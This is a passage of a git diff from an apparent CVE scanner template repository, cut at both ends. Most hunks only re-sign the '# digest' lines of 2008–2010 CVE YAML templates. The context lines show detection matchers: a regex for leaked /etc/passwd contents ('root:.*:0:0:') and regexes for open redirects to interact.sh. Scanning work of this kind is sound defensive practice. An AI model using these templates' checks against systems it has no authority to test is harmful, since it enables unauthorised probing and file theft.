4a0a0047304502201ca9deb48f72754b3365f488f1440ccfd961d0873bf31e88f284fdb9f6de51b5022100d7259acff2d0f20f1d155736785b8fed770640da3f2de50a411aea4e23f9b52f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2008/CVE-2008-4764.yaml b/http/cves/2008/CVE-2008-4764.yaml index a042aff4d3a..250ef15c775 100644 --- a/http/cves/2008/CVE-2008-4764.yaml +++ b/http/cves/2008/CVE-2008-4764.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100acac524f96ab51bbb162a54c205070f42f1a47459f462b32c25bebbb74e373cc02205a0bb0100e669764483edc0f50577d4ba81d81490c77a9bcd8c25b5cb933644c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201aa7bd9dddf79f1f6aee6e6280be397ad1cf543849ae2be3ecb926aa04d53636022100dc40124c0337acb80f1c5efe14c33394bba0b830717bc8ec444bfbc251098692:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2008/CVE-2008-5587.yaml b/http/cves/2008/CVE-2008-5587.yaml index f32575c126e..4b14f596988 100644 --- a/http/cves/2008/CVE-2008-5587.yaml +++ b/http/cves/2008/CVE-2008-5587.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022066362a8927de235c35ffb10692c126edf60433635671630f6f909071d5b2dd3a022100b9bf89dd33a400d1f3cf0814f17b9bc3c17b5bee99044bc45f22f4e28a010060:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b10917fa1a329a43e56e67026f93f9485d5d705362c9894b2b855190149e79b1022100a3d492485bdb28e9481e7172f6e00bdf81e6e5bf0ff39c05c554ba1bf060ddee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2008/CVE-2008-6172.yaml b/http/cves/2008/CVE-2008-6172.yaml index e6f5a7ef575..396a5dc25cb 100644 --- a/http/cves/2008/CVE-2008-6172.yaml +++ b/http/cves/2008/CVE-2008-6172.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202827d95f2a0dc46cf9b62acb6f12269a65851a10b3807c6672adfe03e9dca511022100a0b45b4cf93a36b60828cbada5312ed0aec9ca2841decc495bc72aba128ea542:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b0c446bb98671f828144078b0f654cdeaf7e84505434733db4e76cda4f1f0cdb02206e948c0ad6ca2ebfde8782bf6c59e0f4087c7db0c6359dd77a4374479f0500a4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2008/CVE-2008-6222.yaml b/http/cves/2008/CVE-2008-6222.yaml index 90f369a426b..7776d717ca7 100644 --- a/http/cves/2008/CVE-2008-6222.yaml +++ b/http/cves/2008/CVE-2008-6222.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d2bb5b93f7f5b591f6aa84287f17f352733b1b5736225ee6f3297d883ea3336b02206eba54fe53249fb580cb4e0f5855934ae56d644daee9155bec493bb87aab5e52:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ca76b6c0dc48c8f86bcdead94d6afcc5df772fd0a3b88d2a035bdbf7ada7c5110221008452050eb7780bdd07d742f878ffaeabae227c15b99a4a336ed5e47ce06b50de:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2008/CVE-2008-6465.yaml b/http/cves/2008/CVE-2008-6465.yaml index a1774fddf25..1eed77956fb 100644 --- a/http/cves/2008/CVE-2008-6465.yaml +++ b/http/cves/2008/CVE-2008-6465.yaml @@ -63,4 +63,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b71fa528218639e49ceb934cd22d6c32cffbd90ec1ecec3699e19ae5de51b6be02205e51578cab5debebcc8c52a5d6fe66ee339a47f8db99859d84b3ebcf219a2346:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100fb7a80e547b10b7fc2be53d1caba9a03229295fe5ab7f7e0690f321b3ec5da22022100a51590a8385e58aa59cd99a29a15fbe2cf996b1db89bad7a014d4a966097836d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2008/CVE-2008-6668.yaml b/http/cves/2008/CVE-2008-6668.yaml index 825d1df84ed..70c8aa0b788 100644 --- a/http/cves/2008/CVE-2008-6668.yaml +++ b/http/cves/2008/CVE-2008-6668.yaml @@ -45,4 +45,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221009bb4e980c0817fb02a0c781e82278e38b4df82f9dc5a3fb4c759e71d2dfffc7602203a2beacbe55aaae6566301e8bff262f75f6a50154c57645c249afe54c4bd62f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b1e3a1fbe37655489beda92176846ad079b00be6f4909fa84b037fed8a447e27022100a6bdb97a7b0b9c3a042e24930e11127b13d47df262dcc350ffa314a105fc4d90:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2008/CVE-2008-6982.yaml b/http/cves/2008/CVE-2008-6982.yaml index ff805a164eb..8d9e9b881ec 100644 --- a/http/cves/2008/CVE-2008-6982.yaml +++ b/http/cves/2008/CVE-2008-6982.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 500 -# digest: 490a0046304402206917f253f8a4e9942fd54d04931d833eedb09095b153b0805b3aef8465500b7e02204d8edc2a0b560238873ce31223823a9849092d80e3c662f0b9ba21d497348b1d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205aa2a904f901635e9e242dbc1f38427c1d4bfe0f8f182424ccbe197f6e63546c02207bea0c52609a9620e7bfa79aaddfebb173cc2002ed56802d2d1471d482deede0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2008/CVE-2008-7269.yaml b/http/cves/2008/CVE-2008-7269.yaml index d52efbd2429..db9a208a409 100644 --- a/http/cves/2008/CVE-2008-7269.yaml +++ b/http/cves/2008/CVE-2008-7269.yaml @@ -43,4 +43,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:http?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' -# digest: 4a0a00473045022100b120670ecb1b85e4fd42ab1c5a1c401a057a543e82f3e5be8919b3fb22b7febe0220250add6d55cc033920c2dfe461c6c91fdb4bc0e0c6873792153bb2d899254624:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a1040057ab97948f205c895c3b05f58769bca0b1d6215885b3cd18b67c8d7f1a02207f181e93f8feb713ca6377d9699b087b54bd8268a5bdf783311c82eb6bcaaa90:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2009/CVE-2009-0545.yaml b/http/cves/2009/CVE-2009-0545.yaml index 0164cf5570f..0ab48c2e455 100644 --- a/http/cves/2009/CVE-2009-0545.yaml +++ b/http/cves/2009/CVE-2009-0545.yaml @@ -42,4 +42,4 @@ http: part: body regex: - "root:.*:0:0:" -# digest: 4a0a00473045022100c7d9606518a1812591d5523237baed762457bd2c9914c6226c7d5721e705702802205912b1a1d507eb3e84e32c1d9d4fa1a917d025da0bfe956c62e7efa1bd49fa91:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207162ae12c713e057b22a28528a490ed40de3a37b9002b79cda13f316541aef4e022019c4ca889cfab0599fa1119e8bc9111b34492b8b3c7971b3e0e82f755d015429:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2009/CVE-2009-1496.yaml b/http/cves/2009/CVE-2009-1496.yaml index 52f04bd9742..7d1a3dc5926 100644 --- a/http/cves/2009/CVE-2009-1496.yaml +++ b/http/cves/2009/CVE-2009-1496.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c2ef77ea083268950024dc11105d8d9a95149fa659ca704698dfb5eddda84d48022100a2fd98c4653df6d3b0deac0480440d083f308bc009c829f811c41a3a9d22ab0e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210096aa85fdca8a36d8a3c3abd8399e473f345a02960b246c1a1eedb743619b1d960221008cb6a8acba25a70ca549f31cb7a7745b56e71585e2895543ac5f05a5a14c9f17:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2009/CVE-2009-1558.yaml b/http/cves/2009/CVE-2009-1558.yaml index 4c1b2067ab0..4af834152cf 100644 --- a/http/cves/2009/CVE-2009-1558.yaml +++ b/http/cves/2009/CVE-2009-1558.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100bf32c14c4e404bc7f30e486e6162a45572a4c7403631db938cc69f7113c95fe10221008607239e5c20f53d990fd4497c1c78bbf48bb4f0c04b4582e71ae35ca4dd5a69:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022060066eac8244fb8499c6b1f7af5b260e1a947ff285e8017ba0fb1de6cc523d6f02210087e646296c2cde3e092967bba3dbac57512cfbefb3c95b5db391b05c71e4ac27:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2009/CVE-2009-1872.yaml b/http/cves/2009/CVE-2009-1872.yaml index 1702e9f350a..4ac49a8fb73 100644 --- a/http/cves/2009/CVE-2009-1872.yaml +++ b/http/cves/2009/CVE-2009-1872.yaml @@ -59,4 +59,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220213ee8ea092208493c52b32bdea8187a7ba4c17d9bd70110b396831662225dac02204cf3ac166cd82a5f894649253f416d3069d46c4be74cd235ac83868c357e46b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b3bcf19180731911a1580d51a55fa82251a6a48a61a3195c80bbae083847b942022100afb3e3d74ba77d99dd94c495ef642584c7555d1968dc40c79a4775ae3a908480:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2009/CVE-2009-2015.yaml b/http/cves/2009/CVE-2009-2015.yaml index 9ee97df574e..4fadec99663 100644 --- a/http/cves/2009/CVE-2009-2015.yaml +++ b/http/cves/2009/CVE-2009-2015.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100bb3c826a0c0a5176e20bf9e743628f6f0149f9ef8c581842bf0bdaaed5c3bfe7022071bda001f663e948922f85d31313d8424af42e4c92934a7d8f40996e599b1ae2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202bdd7d7032a25e538a40a533fcef517fbd4fb213d251dd1785361b6d0c6af572022016f2a1c1aa4a568c8d93ae67370eaa755f744441555e5f2b7ef27ab1acd68f8b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2009/CVE-2009-2100.yaml b/http/cves/2009/CVE-2009-2100.yaml index 8999334830e..71981adcf2d 100644 --- a/http/cves/2009/CVE-2009-2100.yaml +++ b/http/cves/2009/CVE-2009-2100.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022001dd3842a75fc61c148d1593d999287708a228dffa2a76a8a3025e90228d00bc022100ba1e07bcc93562bba909fb020e4c3e672c55a55b4cbfbc284d9b6826f8d518f1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022023403abc7d71bcc20576b1668230f01477c2b3701ce8793cbe49ffbac029f8f002202ced12f93b7874acc64e5770cbbd39257d46a30639aee72d782cb4f890c19b6e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2009/CVE-2009-3053.yaml b/http/cves/2009/CVE-2009-3053.yaml index 7e358356929..6464b6185e2 100644 --- a/http/cves/2009/CVE-2009-3053.yaml +++ b/http/cves/2009/CVE-2009-3053.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022002dfcdc4f17e256f7815e471d5762039b4bc27e050f97cbc52b0f7b4ba9dd001022063e8cced1384ae2aa1417ec0275b96781e7f7552c3cda1a704aa574b1178ff7e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100fb1dca085f3cf94f4843dddb0ef383e88f805afaf7c053c3b7b1ba8a9ba2e2fe022023f92d92c6b6191e421f375264443ec58bda57fd14938c5354259d28aa7cbdb2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2009/CVE-2009-3318.yaml b/http/cves/2009/CVE-2009-3318.yaml index 1f02358a4b5..dcc933ea4f0 100644 --- a/http/cves/2009/CVE-2009-3318.yaml +++ b/http/cves/2009/CVE-2009-3318.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210087878ecd491780bbfbb51ae5eb9de1b54b2c28b9515bc564e81aed9b34d2b930022100f4ff414683cc90fa8968de802639cd9c75cc10bef1d53a4b4d55374172c683dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009c4a222f8a77ee32990bceac5d892511ded26af64e75485c6a0454474234bbf802205893de5113b4ef30d91ed42b47d288adca9e72bc98ed9ae9f4a95d0c882393fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2009/CVE-2009-4202.yaml b/http/cves/2009/CVE-2009-4202.yaml index f2be6afbfc1..b440ab0d16e 100644 --- a/http/cves/2009/CVE-2009-4202.yaml +++ b/http/cves/2009/CVE-2009-4202.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502201c6fd812714dce8bca6e466bea409b195c8efa01ea9653bf32368de028a0c5e9022100f7fbb1b2753cadbe97e4a0cc28dec93240c6d7160db619de3c8cc6ef9879ad18:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009d9050b68ab1965a8c8c947e08515d72b0a9dc31582e813645c7f9c333c5561a022014e757c855e6e3a360a5e90f82bdc442f933fe7f5e50a23e9f20488daa98e0ce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2009/CVE-2009-4223.yaml b/http/cves/2009/CVE-2009-4223.yaml index ac3b4935196..74be11f5814 100644 --- a/http/cves/2009/CVE-2009-4223.yaml +++ b/http/cves/2009/CVE-2009-4223.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ae46fc185b2043a8bf76943224634aa2d554b5f7252657381d49cf999e417cdb022100ca1e6733a1e3adea85035547ae37130b888655d7c722c36e556235fbfd11a4aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f460366edf95c777c9e6014cba70064da38d1ba920d8aa1c483da50a41503fb1022013e57f490de166689bddfa5474ec0a0a1c3519736754a84825f983fb17b76775:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2009/CVE-2009-4679.yaml b/http/cves/2009/CVE-2009-4679.yaml index 2b0f074c632..71bb21fe400 100644 --- a/http/cves/2009/CVE-2009-4679.yaml +++ b/http/cves/2009/CVE-2009-4679.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202187ae9cd94453d16a9376f4e1955ccf73be0ddfb42064b1472f18183ce29157022100eb0131bff5d09e374544f7b4ec79c80574503e66b1bfec3efeef3009a408b121:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100db63f036950e631e0fcef6dfaf55ab7f114c90e967e8d643b89a7a40a7ba4a7b02207f3ecb33d5605b3fdabe706031521da71a093c561536442851fb6f7cb7f09b41:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2009/CVE-2009-5020.yaml b/http/cves/2009/CVE-2009-5020.yaml index c326831be65..9779522604c 100644 --- a/http/cves/2009/CVE-2009-5020.yaml +++ b/http/cves/2009/CVE-2009-5020.yaml @@ -39,4 +39,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 490a0046304402202925a500ba06b9cf28dd506c7ef11cfcb992dd73482f7e3143e8ecd3546c528102204fd1f3288ec08eeec1f988e0d2ddbf79196c9c9e91eff027960c8cb3b9573657:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210085c4b1656273b5ee4c220c82eed1b700b33132bfe844a62dae2ce86e58a42ce6022100913d37ad6164eb756dad4f705f6f82c585ff08c429aabf4ab55c533f891a6513:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2009/CVE-2009-5114.yaml b/http/cves/2009/CVE-2009-5114.yaml index 95ae8329609..a1e2dedcddc 100644 --- a/http/cves/2009/CVE-2009-5114.yaml +++ b/http/cves/2009/CVE-2009-5114.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502200e0ace4ae7b1a2cb75ee502b9b133161d42be3fcfbf9974a7448eb9a24222562022100ae0677d740242378f211c41ff4e6a2439d1870f37e70cba24fe881062455d1f2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b35086ab8ce302561a643d5d7b6e26ac2c62b09cb854bc6110fe22e4d6fc570d022019faf441049ce5a3f206a705e254bf61fac6c7df2e84805e1ffd3636158a2d38:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-0696.yaml b/http/cves/2010/CVE-2010-0696.yaml index ecf3d6b0473..84e2bc1396c 100644 --- a/http/cves/2010/CVE-2010-0696.yaml +++ b/http/cves/2010/CVE-2010-0696.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402205c171307a9831c1fd1fc437a03f59f6a59206968619f2b652f91a1f4a9d6e6ee022064a383ec20b11f954c66621d243819bda1e8d31a29d66795197d184c0ce9d4b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201ef49a1ab0525d154757746cc9b3eb264d5153e41de8d64b83b981526e70580e02202135c41ca152d8cc8cca5489283a5493254836785e98b28c4bd2c962f42148c4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-0759.yaml b/http/cves/2010/CVE-2010-0759.yaml index 1c155a6576f..26c215957a6 100644 --- a/http/cves/2010/CVE-2010-0759.yaml +++ b/http/cves/2010/CVE-2010-0759.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221009252279dd25d1e12d442d6aa85b230052125e65cec7d70b01b01e23152a3f5d002202e277440a4d4c1ad69a3c1081fb9f58da68498a48b4afb0eb84a11b2b7ef7bcd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210091f00a6961535ed27ba4cad68e070d0e319db02c9020ccc156daec2ec0091dda022078a13302834d9df58ed7ade0d197874540560891282bd96a7ccc6718da5d41e2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-0942.yaml b/http/cves/2010/CVE-2010-0942.yaml index 8a62ae95524..2644a486b77 100644 --- a/http/cves/2010/CVE-2010-0942.yaml +++ b/http/cves/2010/CVE-2010-0942.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100a3b5e685c30ce9738249669b8004216a1710c4fd1768f5f283fd7a16e917109c022100b21caa1d4339a33fc38062fc9a7e3a26b08384540986a75bd54111920254a5d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203d14ddf666981877bf878f5ff33f9fd0e417f2e292efd6d99f878fd86b4307d0022100de034b943e035be40748d5bf3495ec01995b2fa81534f8d65f83163e9a5404c7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-0943.yaml b/http/cves/2010/CVE-2010-0943.yaml index 7fa4651a1a0..f9d1cd9d179 100644 --- a/http/cves/2010/CVE-2010-0943.yaml +++ b/http/cves/2010/CVE-2010-0943.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c9056bb22c9636dba398595d386e091f7ed7310fe3b29c1791e4e9c6039a14ff022100d144b2af68b5c218c94f9ff2868b7a491caf970c3a2bf67d709e5b499360da51:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204ebba365639cddf9c8b76ef82ce397b8234dc94f1c94a2d2c08e1ba900f3de0e022100d21a5461e51902690661cc180692432081834da7731a8731c79b43f8dfcae9db:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-0944.yaml b/http/cves/2010/CVE-2010-0944.yaml index ef2858aa4c1..5627f5c4655 100644 --- a/http/cves/2010/CVE-2010-0944.yaml +++ b/http/cves/2010/CVE-2010-0944.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022025f42c09d2a0debc2ca5bdde9305e044d0c1acac38b86bba56d625e78e18198e02210082eaddcea816199b530e30a441101023f8bb32ed888dafb167ad8f7d187443de:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100eebebe25896dd725e8c99869baf381bef53533d95656f052a7679578892d830602200dcb3b9edfea69cc49c86c67099898d6cd9fd9bf50e9a6e32d6c7c3527d81754:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-0972.yaml b/http/cves/2010/CVE-2010-0972.yaml index f40af3407b4..a6b1107a3ae 100644 --- a/http/cves/2010/CVE-2010-0972.yaml +++ b/http/cves/2010/CVE-2010-0972.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220512eb06dc51e20d3578d25054e353bc3629115ffcc0fa5561893bdc5388fe44e022063e2ca887779c95ad91dacbac985c0b2c39ac2065f8a99c0a5afec2188a8813d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a1ff8fe7bd69480eb270a8a7640e6a7ec50626eda317e3e9e33a9afdcce460f20220126e8eddc573dfb6d363e5ba32f822239b67a88fa7af20de0b0079fd18893a55:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-0982.yaml b/http/cves/2010/CVE-2010-0982.yaml index 2a49687cb76..60e1b024546 100644 --- a/http/cves/2010/CVE-2010-0982.yaml +++ b/http/cves/2010/CVE-2010-0982.yaml @@ -39,4 +39,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022077cead7cdb37b7ffdd64a2fa1da2b8e8d0e061f88e82b525b9f776ec1887693c0220712f3b49276520c4e1953aad9eb85233bf5f4bcc63a703124a29be9a8079d2db:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008a29e691867d5a47401b58705e7285cf5ac99a0a9ef8e1eac16333408be875f802206ca1ebf2e655d944774774f726764c06a89f121192b6c98f522dae4dfd835d81:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-0985.yaml b/http/cves/2010/CVE-2010-0985.yaml index dc7b3377a0d..64ca5c15e0e 100644 --- a/http/cves/2010/CVE-2010-0985.yaml +++ b/http/cves/2010/CVE-2010-0985.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210082cf793b164cab70ffbcd5e0dbef80314db5e6cf5eee453c5ad837ac1504ac32022030efb1bde180586d0e46ca509dfe13ca66af03fc0bca962475f1bda2251b48e5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c5cb8e870e4b29abb075209e85d17a5af24e310ece0db9c19b04a8bc8a4bfa6a022100881fd0174a837e6b2737597f1f6419c760753446686dbaa0a24c9ed5589e12d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1056.yaml b/http/cves/2010/CVE-2010-1056.yaml index 7abc770e055..6ab8e8c847d 100644 --- a/http/cves/2010/CVE-2010-1056.yaml +++ b/http/cves/2010/CVE-2010-1056.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022011651a89c07d8068da952ebf87cacc7c26983576beaa90e0e94136df514ac1b0022100b587fcfa923c359c6bb347bff7a1a777477b1b7925b46fe66dfe5d26ca2d7028:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022066d864743f900c9464124d97fc59e57fdbbe074069c0f981fab619c27dd1769c022100b292047aa853ad0c6bbc2fe1c19e7e78118d0b450dc3e89d03916ae0eae7a52f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1217.yaml b/http/cves/2010/CVE-2010-1217.yaml index 44118cae2ee..52946e3057f 100644 --- a/http/cves/2010/CVE-2010-1217.yaml +++ b/http/cves/2010/CVE-2010-1217.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ef4e319fbfd89b34d21ee357d93fc8c29aa96655de01f683c88b577286945bb0022100b103e198317216313a199eedfe33b5d639bee3af47ee185f381b3f7665c9ba2a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e4ed2b19d8dd3fe6085a133d0de84ff803420244c08bbea4bbc792d4a13042fc0221008ff8499da252903822878561e469a365015b1472a9b1bf58ca245fa848b9e762:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1219.yaml b/http/cves/2010/CVE-2010-1219.yaml index ef4da21254b..cbf9da9b87e 100644 --- a/http/cves/2010/CVE-2010-1219.yaml +++ b/http/cves/2010/CVE-2010-1219.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022045be1e91ae26f0cbe67e36d37a554b25ae75ec7800c0fc7da56371dce2cd0e86022100dcbd9682645c922563d244e038458fb16470a7a34059ca9a4bdefbd970c66eb1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201a69dd62485e6208fe85e3d422b6ea96696779343bbde8db0904e11c174154e5022100e4e8531300fa15f6924afc447de2f0ede75b931e5db26c333b0ea2a05cba12c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1302.yaml b/http/cves/2010/CVE-2010-1302.yaml index f2498312747..2eab8d09453 100644 --- a/http/cves/2010/CVE-2010-1302.yaml +++ b/http/cves/2010/CVE-2010-1302.yaml @@ -40,4 +40,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220771ae61c2105e32e4413eaf7e61fee8f3ed51f9a834fbf884b4e0d524a1a2e9502203d6f74233a026299b230a42b6e29df9a5d36d91290550005f7f48ef72084b190:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009323f9d23226c3f91a3b8c0da0e26362893015671ad9c5d7320f4bd8118d2d9902203feab170838b8d98f5c03c3f9d5db77ff14a5e200c186d54b08740798ebdc0c7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1304.yaml b/http/cves/2010/CVE-2010-1304.yaml index 95962882d4c..642e11c1702 100644 --- a/http/cves/2010/CVE-2010-1304.yaml +++ b/http/cves/2010/CVE-2010-1304.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100dd9f0d6d1be1d743962d1a2a2f6c115a11c9bf67836937f760fb92da43aeaef2022100803c923049657d59ab623923d3ef09801c5f6d5934f5560fa2a12ac82e73121b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a17f2a9ff6243ed32277b2897ef1609dc1a0cbad67ce2e464782cba93c00920f022100a3320df1fb757e9409e535801027dacb20aa5c9f9fb24aa8b8f1f778ef9e7941:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1306.yaml b/http/cves/2010/CVE-2010-1306.yaml index e457c4aa976..c180c8a73ff 100644 --- a/http/cves/2010/CVE-2010-1306.yaml +++ b/http/cves/2010/CVE-2010-1306.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ef546c9e410c9197fb15e62af7702b2007f12dbdd2dc9416ab24038af273aa3302207026719897f432226847031fdd7aa24fbf58a7941398a5e880176d747a251bef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022042e70aa49a35bfef387aeeb60db6d2338fd6f16d245431979120a53462a5503202205ad32ebc0ae47749e8f7c5138031b5a875a280d6517f0984e36fb393d6301e77:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1307.yaml b/http/cves/2010/CVE-2010-1307.yaml index f0595c9916a..0d2c12cf9d0 100644 --- a/http/cves/2010/CVE-2010-1307.yaml +++ b/http/cves/2010/CVE-2010-1307.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220524deac408575c32fb54c75f1e98ef33f595040f4e7c1e261559b4d0a436c3ed02203d6d33661e6de727ddde1fa71d356b8a20d6c38acf1248b28a6c9556ee4c628e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100dbe5252aaa2e91310270eabac0f839b28e0edf27462bd13d85dea6d32f432a2c02204988e73fefa88d5009ab3eea4d80bf22efb6407e85d8b604b4b693c1bdb1c131:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1308.yaml b/http/cves/2010/CVE-2010-1308.yaml index a0b5e71e26f..691539433f1 100644 --- 